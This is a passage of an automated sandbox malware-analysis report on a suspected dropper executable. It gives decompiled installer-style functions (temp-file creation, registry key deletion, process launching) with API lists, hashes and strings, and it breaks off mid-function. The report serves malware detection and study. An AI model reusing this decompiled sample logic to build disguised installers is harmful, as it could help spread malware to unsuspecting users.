                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
                                  • API String ID: 3751793516-3958623274
                                  • Opcode ID: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
                                  • Instruction ID: ee19d1f973d54ef8b99b3b54f6c062267f549ed0b0d588b48896c2ad5940add3
                                  • Opcode Fuzzy Hash: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
                                  • Instruction Fuzzy Hash: 42112532908150ABDB212F755D04EAF77B4AA66366724073BF491B62E2C63D1D428A2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1006 405875-40587f 1007 405880-4058ab GetTickCount GetTempFileNameA 1006->1007 1008 4058ba-4058bc 1007->1008 1009 4058ad-4058af 1007->1009 1010 4058b4-4058b7 1008->1010 1009->1007 1011 4058b1 1009->1011 1011->1010
                                  C-Code - Quality: 100%
                                  			E00405875(char _a4, intOrPtr _a6, CHAR* _a8) {
                                  				char _t11;
                                  				signed int _t12;
                                  				int _t15;
                                  				signed int _t17;
                                  				void* _t20;
                                  				CHAR* _t21;
                                  
                                  				_t21 = _a4;
                                  				_t20 = 0x64;
                                  				while(1) {
                                  					_t11 =  *0x409368; // 0x61736e
                                  					_t20 = _t20 - 1;
                                  					_a4 = _t11;
                                  					_t12 = GetTickCount();
                                  					_t17 = 0x1a;
                                  					_a6 = _a6 + _t12 % _t17;
                                  					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                  					if(_t15 != 0) {
                                  						break;
                                  					}
                                  					if(_t20 != 0) {
                                  						continue;
                                  					}
                                  					 *_t21 =  *_t21 & 0x00000000;
                                  					return _t15;
                                  				}
                                  				return _t21;
                                  			}










                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405889
                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-1894475642
                                  • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                  • Instruction ID: 1dda5c804d7827273bb1028780a4a64484350cceb0838572b068d11ab2f99610
                                  • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                  • Instruction Fuzzy Hash: 44F0E2333082046BEB009F16DC04B9B7B9DDF91760F00C037FD04DA180D2B098548B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1012 402a47-402a70 RegOpenKeyExA 1013 402a72-402a7d 1012->1013 1014 402adb-402adf 1012->1014 1015 402a98-402aa8 RegEnumKeyA 1013->1015 1016 402aaa-402abc RegCloseKey call 405ec3 1015->1016 1017 402a7f-402a82 1015->1017 1025 402ae2-402ae8 1016->1025 1026 402abe-402acd 1016->1026 1019 402a84-402a96 call 402a47 1017->1019 1020 402acf-402ad2 RegCloseKey 1017->1020 1019->1015 1019->1016 1023 402ad8-402ada 1020->1023 1023->1014 1025->1023 1027 402aea-402af8 RegDeleteKeyA 1025->1027 1026->1014 1027->1023 1029 402afa 1027->1029 1029->1014
                                  C-Code - Quality: 84%
                                  			E00402A47(void* _a4, char* _a8, long _a12) {
                                  				void* _v8;
                                  				char _v272;
                                  				signed char _t16;
                                  				long _t18;
                                  				long _t25;
                                  				intOrPtr* _t27;
                                  				long _t28;
                                  
                                  				_t16 =  *0x42ec50; // 0x100
                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8); // executed
                                  				if(_t18 == 0) {
                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                  						__eflags = _a12;
                                  						if(_a12 != 0) {
                                  							RegCloseKey(_v8);
                                  							L8:
                                  							__eflags = 1;
                                  							return 1;
                                  						}
                                  						_t25 = E00402A47(_v8,  &_v272, 0);
                                  						__eflags = _t25;
                                  						if(_t25 != 0) {
                                  							break;
                                  						}
                                  					}
                                  					RegCloseKey(_v8);
                                  					_t27 = E00405EC3(2);
                                  					if(_t27 == 0) {
                                  						__eflags =  *0x42ec50; // 0x100
                                  						if(__eflags != 0) {
                                  							goto L8;
                                  						}
                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                  						__eflags = _t28;
                                  						if(_t28 != 0) {
                                  							goto L8;
                                  						}
                                  						return _t28;
                                  					}
                                  					return  *_t27(_a4, _a8,  *0x42ec50, 0);
                                  				}
                                  				return _t18;
                                  			}











                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000100,?), ref: 00402A68
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
                                  • Instruction ID: 65caa8dba947dc35e866d31b7f01948ae96153933ca281d28be61e62e6d6ab53
                                  • Opcode Fuzzy Hash: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
                                  • Instruction Fuzzy Hash: C9116D31600108BFDF219F91DE49EAB3B7DEB04358B104436FA05F00A0DBB48E529F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (graph image not reproduced; legend: Executed, Not Executed)
                                  C-Code - Quality: 89%
                                  			E100016DA(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				void _v36;
                                  				struct HINSTANCE__* _t34;
                                  				intOrPtr _t38;
                                  				void* _t44;
                                  				void* _t45;
                                  				void* _t46;
                                  				void* _t50;
                                  				intOrPtr _t53;
                                  				signed int _t57;
                                  				signed int _t61;
                                  				void* _t65;
                                  				void* _t66;
                                  				void* _t70;
                                  				void* _t74;
                                  
                                  				_t74 = __esi;
                                  				_t66 = __edi;
                                  				_t65 = __edx;
                                  				 *0x1000405c = _a8;
                                  				 *0x10004060 = _a16;
                                  				 *0x10004064 = _a12;
                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573);
                                  				_push(1); // executed
                                  				_t34 = E10001A86(); // executed
                                  				_t50 = _t34;
                                  				if(_t50 == 0) {
                                  					L28:
                                  					return _t34;
                                  				} else {
                                  					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                  						E10002165(_t50);
                                  					}
                                  					E100021AF(_t65, _t50);
                                  					_t53 =  *((intOrPtr*)(_t50 + 4));
                                  					if(_t53 == 0xffffffff) {
                                  						L14:
                                  						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
                                  							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                  								_push(_t50);
                                  								_t34 = E1000236D(_t65);
                                  							} else {
                                  								_push(_t74);
                                  								_push(_t66);
                                  								_t12 = _t50 + 0x818; // 0x818
                                  								_t57 = 8;
                                  								memcpy( &_v36, _t12, _t57 << 2);
                                  								_t38 = E10001576(_t50);
                                  								_t15 = _t50 + 0x818; // 0x818
                                  								_t70 = _t15;
                                  								_push(_t50);
                                  								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
                                  								 *_t70 = 3;
                                  								E1000236D(_t65);
                                  								_t61 = 8;
                                  								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                  							}
                                  						} else {
                                  							_push(_t50);
                                  							E1000236D(_t65);
                                  							_t34 = GlobalFree(E10001278(E10001576(_t50)));
                                  						}
                                  						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                  							_t34 = E10002333(_t50);
                                  							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
                                  								_t34 =  *(_t50 + 0x808);
                                  								if(_t34 != 0) {
                                  									_t34 = FreeLibrary(_t34);
                                  								}
                                  							}
                                  							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
                                  								_t34 = E100014FF( *0x10004058);
                                  							}
                                  						}
                                  						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
                                  							goto L28;
                                  						} else {
                                  							return GlobalFree(_t50);
                                  						}
                                  					}
                                  					_t44 =  *_t50;
                                  					if(_t44 == 0) {
                                  						if(_t53 != 1) {
                                  							goto L14;
                                  						}
                                  						E10002A57(_t50);
                                  						L12:
                                  						_t50 = _t44;
                                  						L13:
                                  						goto L14;
                                  					}
                                  					_t45 = _t44 - 1;
                                  					if(_t45 == 0) {
                                  						L8:
                                  						_t44 = E1000279C(_t53, _t50); // executed
                                  						goto L12;
                                  					}
                                  					_t46 = _t45 - 1;
                                  					if(_t46 == 0) {
                                  						E10002540(_t50);
                                  						goto L13;
                                  					}
                                  					if(_t46 != 1) {
                                  						goto L14;
                                  					}
                                  					goto L8;
                                  				}
                                  			}


















                                  APIs
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CCE
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CD3
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CD8
                                  • GlobalFree.KERNEL32 ref: 10001785
                                  • FreeLibrary.KERNEL32(?), ref: 100017FC
                                  • GlobalFree.KERNEL32 ref: 10001821
                                    • Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197
                                    • Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                    • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,10004010,00000000,100016B2,00000000), ref: 1000158F
                                    • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                    • Part of subcall function 1000236D: GlobalFree.KERNEL32 ref: 1000248E
                                    • Part of subcall function 1000236D: GlobalFree.KERNEL32 ref: 100024B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                  • String ID:
                                  • API String ID: 1767494692-3916222277
                                  • Opcode ID: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                  • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                  • Opcode Fuzzy Hash: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                  • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00404E19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				long _t9;
                                  				int _t15;
                                  				long _t16;
                                  
                                  				_t15 = _a8;
                                  				if(_t15 != 0x102) {
                                  					if(_t15 != 0x200) {
                                  						_t16 = _a16;
                                  						L7:
                                  						if(_t15 == 0x419 &&  *0x42a00c != _t16) {
                                  							_push(_t16);
                                  							_push(6);
                                  							 *0x42a00c = _t16;
                                  							E004047F0();
                                  						}
                                  						L11:
                                  						_t9 = CallWindowProcA( *0x42a014, _a4, _t15, _a12, _t16); // executed
                                  						return _t9;
                                  					}
                                  					if(IsWindowVisible(_a4) == 0) {
                                  						L10:
                                  						_t16 = _a16;
                                  						goto L11;
                                  					}
                                  					_t16 = E00404770(_a4, 1);
                                  					_t15 = 0x419;
                                  					goto L7;
                                  				}
                                  				if(_a12 != 0x20) {
                                  					goto L10;
                                  				}
                                  				E00403EF4(0x413);
                                  				return 0;
                                  			}







                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00404E48
                                  • CallWindowProcA.USER32 ref: 00404E99
                                    • Part of subcall function 00403EF4: SendMessageA.USER32 ref: 00403F06
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
                                  • Instruction ID: 15cec7ad730383037ace73de1cf566d9f400779eaaed3c89d674d6bcdef9eb11
                                  • Opcode Fuzzy Hash: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
                                  • Instruction Fuzzy Hash: 20015EB1100208AFDF215F11DC85A9B3A2AF7D4765F50413AFF04762D1C37A9C91DBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405368(CHAR* _a4) {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				int _t7;
                                  
                                  				0x42b828->cb = 0x44;
                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42b828,  &_v20); // executed
                                  				if(_t7 != 0) {
                                  					CloseHandle(_v20.hThread);
                                  					return _v20.hProcess;
                                  				}
                                  				return _t7;
                                  			}






                                  APIs
                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
                                  • CloseHandle.KERNEL32(?), ref: 0040539A
                                  Strings
                                  • Error launching installer, xrefs: 0040537B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
                                  • Instruction ID: 8a6f12bc318ec6a69002769553d16d4b3f873146e0ffdb4928c8eb689fb6cc4d
                                  • Opcode Fuzzy Hash: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
                                  • Instruction Fuzzy Hash: 86E0ECB4A00209ABDB00AF64EC09A6B7BBCEB04344F408531E914E2150E778E9109AA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E004030D7(void* __eflags) {
                                  				void* _t2;
                                  				void* _t5;
                                  				CHAR* _t6;
                                  
                                  				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                  				E00405E03(_t6);
                                  				_t2 = E004056B2(_t6);
                                  				if(_t2 != 0) {
                                  					E00405645(_t6);
                                  					CreateDirectoryA(_t6, 0); // executed
                                  					_t5 = E00405875("1033", _t6); // executed
                                  					return _t5;
                                  				} else {
                                  					return _t2;
                                  				}
                                  			}







                                  APIs
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                    • Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 004030F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Char$Next$CreateDirectoryPrev
                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 4115351271-1075807775
                                  • Opcode ID: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
                                  • Instruction ID: fd0f6b97774aff97ce55239a91fc0964d985d8a64bd9372f8197c1aef795e8ac
                                  • Opcode Fuzzy Hash: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
                                  • Instruction Fuzzy Hash: 18D05222506C3022E15133267C16FCF060C8F4A31AF919077F408710824A2E4A8208FE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E00401B11(void* __ebx, void* __edx) {
                                  				intOrPtr _t7;
                                  				void* _t8;
                                  				void _t11;
                                  				void* _t13;
                                  				void* _t21;
                                  				void* _t24;
                                  				void* _t30;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t37;
                                  
                                  				_t27 = __ebx;
                                  				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
                                  				_t30 =  *0x40afc4; // 0x0
                                  				if(_t7 == __ebx) {
                                  					if(__edx == __ebx) {
                                  						_t8 = GlobalAlloc(0x40, 0x404); // executed
                                  						_t34 = _t8;
                                  						_t4 = _t34 + 4; // 0x4
                                  						E00405BBA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
                                  						_t11 =  *0x40afc4; // 0x0
                                  						 *_t34 = _t11;
                                  						 *0x40afc4 = _t34;
                                  					} else {
                                  						if(_t30 == __ebx) {
                                  							 *((intOrPtr*)(_t37 - 4)) = 1;
                                  						} else {
                                  							_t2 = _t30 + 4; // 0x4
                                  							E00405B98(_t33, _t2);
                                  							_push(_t30);
                                  							 *0x40afc4 =  *_t30;
                                  							GlobalFree();
                                  						}
                                  					}
                                  					goto L15;
                                  				} else {
                                  					while(1) {
                                  						_t7 = _t7 - 1;
                                  						if(_t30 == _t27) {
                                  							break;
                                  						}
                                  						_t30 =  *_t30;
                                  						if(_t7 != _t27) {
                                  							continue;
                                  						} else {
                                  							if(_t30 == _t27) {
                                  								break;
                                  							} else {
                                  								_t32 = _t30 + 4;
                                  								E00405B98(0x409bc0, _t30 + 4);
                                  								_t21 =  *0x40afc4; // 0x0
                                  								E00405B98(_t32, _t21 + 4);
                                  								_t24 =  *0x40afc4; // 0x0
                                  								_push(0x409bc0);
                                  								_push(_t24 + 4);
                                  								E00405B98();
                                  								L15:
                                  								 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t37 - 4));
                                  								_t13 = 0;
                                  							}
                                  						}
                                  						goto L17;
                                  					}
                                  					_push(0x200010);
                                  					_push(E00405BBA(_t27, _t30, _t33, _t27, 0xffffffe8));
                                  					E004053C9();
                                  					_t13 = 0x7fffffff;
                                  				}
                                  				L17:
                                  				return _t13;
                                  			}














                                  APIs
                                  • GlobalFree.KERNEL32 ref: 00401B80
                                  • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree
                                  • String ID: Call
                                  • API String ID: 3394109436-1824292864
                                  • Opcode ID: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
                                  • Instruction ID: bfdb79625eb78255327a415742f54a265397f278bf875e9f7b12c7fb5acb2754
                                  • Opcode Fuzzy Hash: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
                                  • Instruction Fuzzy Hash: DA21C0B2A00201ABD710ABA5DF88D5F73B5EB49314724057BF501F32D2D6BCB8118B1E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00401E32() {
                                  				void* _t15;
                                  				void* _t24;
                                  				void* _t26;
                                  				void* _t31;
                                  
                                  				_t28 = E00402A07(_t24);
                                  				E00404EA5(0xffffffeb, _t13);
                                  				_t15 = E00405368(_t28); // executed
                                  				 *(_t31 + 8) = _t15;
                                  				if(_t15 == _t24) {
                                  					 *((intOrPtr*)(_t31 - 4)) = 1;
                                  				} else {
                                  					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                  						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                  							E00405EFC(0xf);
                                  						}
                                  						GetExitCodeProcess( *(_t31 + 8), _t31 - 8);
                                  						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                  							if( *(_t31 - 8) != _t24) {
                                  								 *((intOrPtr*)(_t31 - 4)) = 1;
                                  							}
                                  						} else {
                                  							E00405AF6(_t26,  *(_t31 - 8));
                                  						}
                                  					}
                                  					_push( *(_t31 + 8));
                                  					CloseHandle();
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t31 - 4));
                                  				return 0;
                                  			}








                                  APIs
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                    • Part of subcall function 00405368: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
                                    • Part of subcall function 00405368: CloseHandle.KERNEL32(?), ref: 0040539A
                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                  • GetExitCodeProcess.KERNEL32 ref: 00401E7C
                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                  • String ID:
                                  • API String ID: 3521207402-0
                                  • Opcode ID: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
                                  • Instruction ID: 47b0888271ef8fef87928745203e2db848c347203f0d50bde1ae1afdf34c4489
                                  • Opcode Fuzzy Hash: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
                                  • Instruction Fuzzy Hash: BE018031A04219EBDF10AFA1CD859AE7B71EB00344F20857BF601B51E1C7B95A81EF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00405A7F(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                  				long _t20;
                                  				long _t23;
                                  				long _t24;
                                  				char* _t26;
                                  
                                  				asm("sbb eax, eax");
                                  				_t26 = _a16;
                                  				 *_t26 = 0;
                                  				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                  				if(_t20 == 0) {
                                  					_a8 = 0x400;
                                  					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                  					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                  						 *_t26 = 0;
                                  					}
                                  					_t26[0x3ff] = 0;
                                  					_t24 = RegCloseKey(_a20); // executed
